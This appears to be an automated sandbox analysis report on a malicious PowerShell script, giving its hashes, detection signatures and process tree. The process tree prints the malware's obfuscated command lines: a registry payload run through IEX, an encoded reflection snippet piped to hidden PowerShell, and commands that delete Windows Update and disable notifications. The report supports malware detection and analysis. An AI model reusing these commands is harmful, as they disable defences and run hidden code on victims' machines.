Edit tour
Windows
Analysis Report
SUS.ps1
Overview
General Information
| Sample name: | SUS.ps1 |
| Analysis ID: | 1607783 |
| MD5: | f85f710cb9208db9a5795c6aa73b7819 |
| SHA1: | f35a5f68a3f3aae842d491fa2d11671ae588f854 |
| SHA256: | e3a3fd70840d9c8a402880ee7d0d9c3e7435c1329d074c45a31f97a35dd83d46 |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Yara detected Powershell decode and execute
Yara detected UAC Bypass using CMSTP
Changes security center settings (notifications, updates, antivirus, firewall)
Disable Windows Notification Center
Disable Windows Toast Notifications
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Obfuscated command line found
Powershell drops PE file
Sample is not signed and drops a device driver
Stops critical windows services
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Uses cmd line tools excessively to alter registry or file data
Uses powercfg.exe to modify the power settings
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May initialize a security null descriptor
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64_ra
powershell.exe (PID: 3552 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -noLogo -E xecutionPo licy unres tricted -f ile "C:\Us ers\user\D esktop\SUS .ps1" MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 3984 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6164 cmdline:
"C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" $lambczoja anjr=[Syst em.Text.En coding]::A SCII.GetSt ring($(gp HKCU:\Soft ware\cudyo iiqiyyyd). iaetrrvsxs jkc); ri - Force HKCU :\Software \cudyoiiqi yyyd; IEX( $lambczoja anjr) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 6180 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
svchost.exe (PID: 7160 cmdline: C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cmd.exe (PID: 6712 cmdline:
"C:\Window s\Sysnativ e\cmd.exe" /C "echo $($tiebici slihiakywl e=$([Ref]. Assembly.G etType('vi qeempiapqy lyunela')) ;$hatuwuce huubumag=[ Ref].Assem bly.GetTyp e($((249,3 63,345,348 ,303,327,1 38,231,291 ,330,291,3 09,303,327 ,303,330,3 48,138,195 ,351,348,3 33,327,291 ,348,315,3 33,330,138 ,195,327,3 45,315,255 ,348,315,3 24,345)^^^ |%{[char]( $_/3)})-jo in'');$ygg ugyygypylr ycood=$(14 2 -ge 126) ;if($hatuw ucehuubuma g){$hatuwu cehuubumag .GetField( $((28,40,4 6,36,4,41, 36,47,1,28 ,36,39,32, 31)^^^|%{[ char]($_+6 9)})-join' ',$((156,2 22,220,160 ,234,196,2 16,210,198 ,88,166,23 2,194,232, 210,198)^^ ^|%{[char] ($_/2)})-j oin'').Set Value($tie bicislihia kywle,$ygg ugyygypylr ycood)}; $ oktoundive emzaynfo = $('{7}{1} {4}{6}{9}{ 3}' -f 'n' ,'','g','x ','','i',' ','i','b', 'e','v'); $((364,332 ,484,460,4 64,404,436 ,184,276,4 40,472,420 ,456,444,4 40,436,404 ,440,464,3 72,232,232 ,332,404,4 64,276,440 ,472,420,4 56,444,440 ,436,404,4 40,464,344 ,388,456,4 20,388,392 ,432,404,1 60,156,388 ,432,440,3 88,460,468 ,484,456,4 16,484,476 ,444,484,4 52,476,404 ,432,444,4 44,480,412 ,484,488,4 84,472,156 ,176,128,2 28,208,212 ,212,164,2 36,128,144 ,160,364,4 56,404,412 ,404,480,3 72,232,232 ,308,388,4 64,396,416 ,160,160,3 64,460,464 ,456,420,4 40,412,372 ,144,160,3 96,436,400 ,128,188,2 68,128,456 ,404,412,1 28,452,468 ,404,456,4 84,128,288 ,300,268,3 40,368,332 ,444,408,4 64,476,388 ,456,404,3 68,340,396 ,420,488,3 88,416,128 ,188,472,1 28,404,408 ,480,468,3 96,420,404 ,452,444,1 64,164,176 ,128,156,3 28,276,284 ,380,332,3 60,364,128 ,372,172,1 60,184,168 ,164,156,1 64,184,284 ,456,444,4 68,448,460 ,364,196,3 72,184,344 ,388,432,4 68,404,128 ,496,128,2 92,276,352 ,164)^^^|% {[char]($_ /4)})-join '') ^^^| ^ ^^&($oktou ndiveemzay nfo) | %Wi nDir%\SysW OW64\Windo wsPowerShe ll\v1.0\po wershell.e xe -Window Hidden -c -" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6720 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 3684 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho $($tieb icislihiak ywle=$([Re f].Assembl y.GetType( 'viqeempia pqylyunela '));$hatuw ucehuubuma g=[Ref].As sembly.Get Type($((24 9,363,345, 348,303,32 7,138,231, 291,330,29 1,309,303, 327,303,33 0,348,138, 195,351,34 8,333,327, 291,348,31 5,333,330, 138,195,32 7,345,315, 255,348,31 5,324,345) ^|%{[char] ($_/3)})-j oin'');$yg gugyygypyl rycood=$(1 42 -ge 126 );if($hatu wucehuubum ag){$hatuw ucehuubuma g.GetField ($((28,40, 46,36,4,41 ,36,47,1,2 8,36,39,32 ,31)^|%{[c har]($_+69 )})-join'' ,$((156,22 2,220,160, 234,196,21 6,210,198, 88,166,232 ,194,232,2 10,198)^|% {[char]($_ /2)})-join '').SetVal ue($tiebic islihiakyw le,$yggugy ygypylryco od)}; $okt oundiveemz aynfo = $( '{7}{1}{4} {6}{9}{3}' -f 'n','' ,'g','x',' ','i','',' i','b','e' ,'v'); $(( 364,332,48 4,460,464, 404,436,18 4,276,440, 472,420,45 6,444,440, 436,404,44 0,464,372, 232,232,33 2,404,464, 276,440,47 2,420,456, 444,440,43 6,404,440, 464,344,38 8,456,420, 388,392,43 2,404,160, 156,388,43 2,440,388, 460,468,48 4,456,416, 484,476,44 4,484,452, 476,404,43 2,444,444, 480,412,48 4,488,484, 472,156,17 6,128,228, 208,212,21 2,164,236, 128,144,16 0,364,456, 404,412,40 4,480,372, 232,232,30 8,388,464, 396,416,16 0,160,364, 460,464,45 6,420,440, 412,372,14 4,160,396, 436,400,12 8,188,268, 128,456,40 4,412,128, 452,468,40 4,456,484, 128,288,30 0,268,340, 368,332,44 4,408,464, 476,388,45 6,404,368, 340,396,42 0,488,388, 416,128,18 8,472,128, 404,408,48 0,468,396, 420,404,45 2,444,164, 164,176,12 8,156,328, 276,284,38 0,332,360, 364,128,37 2,172,160, 184,168,16 4,156,164, 184,284,45 6,444,468, 448,460,36 4,196,372, 184,344,38 8,432,468, 404,128,49 6,128,292, 276,352,16 4)^|%{[cha r]($_/4)}) -join'') ^ | ^&($okto undiveemza ynfo) " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - powershell.exe (PID: 3008 cmdline:
C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.exe -W indow Hidd en -c - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - cmd.exe (PID: 2740 cmdline:
"C:\Window s\system32 \cmd.exe" /C reg que ry HKCU\So ftware\Uci zah /v efx ucieqo MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - reg.exe (PID: 7108 cmdline:
reg query HKCU\Softw are\Ucizah /v efxuci eqo MD5: CDD462E86EC0F20DE2A1D781928B1B0C) - cmd.exe (PID: 5764 cmdline:
/C sc stop wuauserv MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - sc.exe (PID: 4540 cmdline:
sc stop wu auserv MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8) - cmd.exe (PID: 408 cmdline:
/C sc conf ig wuauser v start= d isabled MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - sc.exe (PID: 6692 cmdline:
sc config wuauserv s tart= disa bled MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8) - cmd.exe (PID: 6724 cmdline:
/C sc dele te wuauser v MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - sc.exe (PID: 1608 cmdline:
sc delete wuauserv MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8) - cmd.exe (PID: 2356 cmdline:
/C reg add "HKLM\SOF TWARE\Poli cies\Micro soft\Windo ws\Explore r" /v "Dis ableNotifi cationCent er" /t REG _DWORD /d "1" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - reg.exe (PID: 3424 cmdline:
reg add "H KLM\SOFTWA RE\Policie s\Microsof t\Windows\ Explorer" /v "Disabl eNotificat ionCenter" /t REG_DW ORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C) - cmd.exe (PID: 1448 cmdline:
/C reg add "HKCU\SOF TWARE\Micr osoft\Wind ows\Curren tVersion\P ushNotific ations" /v "ToastEna bled" /t R EG_DWORD / d "0" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - reg.exe (PID: 1284 cmdline:
reg add "H KCU\SOFTWA RE\Microso ft\Windows \CurrentVe rsion\Push Notificati ons" /v "T oastEnable d" /t REG_ DWORD /d " 0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C) - cmd.exe (PID: 6176 cmdline:
/C reg add "HKEY_LOC AL_MACHINE \SYSTEM\Cu rrentContr olSet\Cont rol\Sessio n Manager\ Power" /v HiberbootE nabled /t REG_DWORD /d 0 /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - reg.exe (PID: 2740 cmdline:
reg add "H KEY_LOCAL_ MACHINE\SY STEM\Curre ntControlS et\Control \Session M anager\Pow er" /v Hib erbootEnab led /t REG _DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C) - cmd.exe (PID: 1228 cmdline:
/C powercf g -hiberna te off MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - powercfg.exe (PID: 6900 cmdline:
powercfg - hibernate off MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)
- svchost.exe (PID: 3740 cmdline:
C:\Windows \System32\ svchost.ex e -k Netwo rkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- SgrmBroker.exe (PID: 7084 cmdline:
C:\Windows \system32\ SgrmBroker .exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
- svchost.exe (PID: 6508 cmdline:
C:\Windows \System32\ svchost.ex e -k Local SystemNetw orkRestric ted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 5444 cmdline:
C:\Windows \System32\ svchost.ex e -k Local ServiceNet workRestri cted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) 
MpCmdRun.exe (PID: 5724 cmdline: "C:\Progra m Files\Wi ndows Defe nder\mpcmd run.exe" - wdenable MD5: B3676839B2EE96983F9ED735CD044159) - conhost.exe (PID: 1608 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- svchost.exe (PID: 5508 cmdline:
C:\Windows \system32\ svchost.ex e -k Unist ackSvcGrou p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security | ||
| JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
| JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security | ||
| JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
| JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security | ||
| Click to see the 8 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: frack113: | ||
| Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): | ||